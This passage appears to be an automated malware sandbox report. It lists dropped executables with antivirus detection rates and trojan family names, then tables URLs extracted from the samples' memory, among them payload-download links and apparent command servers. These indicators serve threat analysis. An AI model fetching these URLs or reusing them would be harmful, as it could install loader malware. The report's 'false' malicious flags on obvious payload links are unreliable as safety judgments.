C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe | 16% | ReversingLabs | Win64.Trojan.Midie
C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe | 16% | ReversingLabs | Win64.Trojan.Midie
C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe | 16% | ReversingLabs | Win64.Trojan.Midie
C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe | 75% | ReversingLabs | Win32.Trojan.Operaloader
C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe | 16% | ReversingLabs | Win64.Trojan.Midie
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Default12_my[1].exe | 22% | ReversingLabs | Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exe | 24% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exe | 88% | ReversingLabs | Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exe | 30% | ReversingLabs | Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe | 75% | ReversingLabs | Win32.Trojan.Operaloader
C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe | 16% | ReversingLabs | Win64.Trojan.Midie
C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe | 16% | ReversingLabs | Win64.Trojan.Midie
C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe | 16% | ReversingLabs | Win64.Trojan.Midie
                        No Antivirus matches
                        No contacted domains info
Malicious URLs
Name | Malicious
http://185.172.128.76/3cd2b41cbde8fc9c.php | true
URLs found in memory dumps (Name is the string as extracted, including any trailing bytes)
Name | Source | Malicious
https://duckduckgo.com/chrome_newtab | u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmp | false
https://duckduckgo.com/ac/?q= | u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmp | false
http://5.42.66.10/download/123p.exe3W | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp | false
http://www.vmware.com/0 | Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmp | false
http://5.42.66.10/download/th/retail.phphp | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmp | false
http://togaterecutirenics.sbs/0 | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp | false
https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exek | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp | false
http://invalidlog.txtlookup | PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmp | false
http://wikkt.com/forum/index.php3su | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1488155637.0000000004165000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmp | false
https://togaterecutirenics.sbs/rt | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1453908557.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1453988094.000000000417E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1449962557.000000000417F000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://zanzibarpivo.com/7725eaa6592c80f8124e769b4e8a07f7.exet | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp | false
http://www.indyproject.org/ | VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmp | false
https://vk.com/doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08Gc | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmp | false
https://carthewasher.net/EQ | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://vk.com:80/doc5294803_668862025?hash=rZAtNKZ8jzd7e9UKuB7jZZstkXZGEcmTXg0oxAzukh8&dl=bnAa6o9El | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp | false
https://zanzibarpivo.com/ | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://vk.com:80/doc5294803_668907894?hash=eTJ5SXFgNlVQn3fSuayzbK2uQj2QDtrGinGQ1gFeZF8&dl=85Q0IzWrQ | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp | false
https://vk.com/doc5294803_668900186?hash=FpdDjHFtSx5c0WPZoJe3fUQ5LwI9qJk1fUTDbMELBQ8&dl=XG2RO9fdQ1T9 | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://vk.com/6 | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp | false
http://wikkt.com/forum/index.php | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmp | false
http://5.42.66.10/download/th/space.php=W | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
http://5.42.66.10/download/th/getimage12.phpAV | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://monoblocked.com/525403/setup.exes | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://turnitin.com/robot/crawlerinfo.html)cannot | PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmp | false
http://5.42.66.10/download/th/space.php( | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507524439.0000000002AE5000.00000004.00000020.00020000.00000000.sdmp | false
https://dod.fastbutters.com:80/style/060.exeEQ | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp | false
https://c.574859385.xyz/ | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
http://5.42.66.10/download/th/getimage12.phpUV | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://carthewasher.net/ba05c0a0a72880db02f3b2bf7866285a/cad54ba5b01423b1af8ec10ab5719d97.exe | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.000000000417B000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1443603426.0000000004148000.00000004.00000020.00020000.00000000.sdmp | false
https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe8 | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp | false
https://monoblocked.com:80/525403/setup.exe | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmp | false
http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4 | PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmp | false
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection | Qg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmp | false
https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exe | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp | false
https://www.ecosia.org/newtab/ | u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmp | false
http://ocsp.sectigo.com0& | t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmp | false
http://www.symauth.com/cps0( | Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmp | false
https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeJ | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp | false
http://5.42.66.10/download/th/space.php4W | 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmp | false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | u5v8.0.exe, 0000000A.00000003.1948291370.0000000030A93000.00000004.00000020.00020000.00000000.sdmp | false
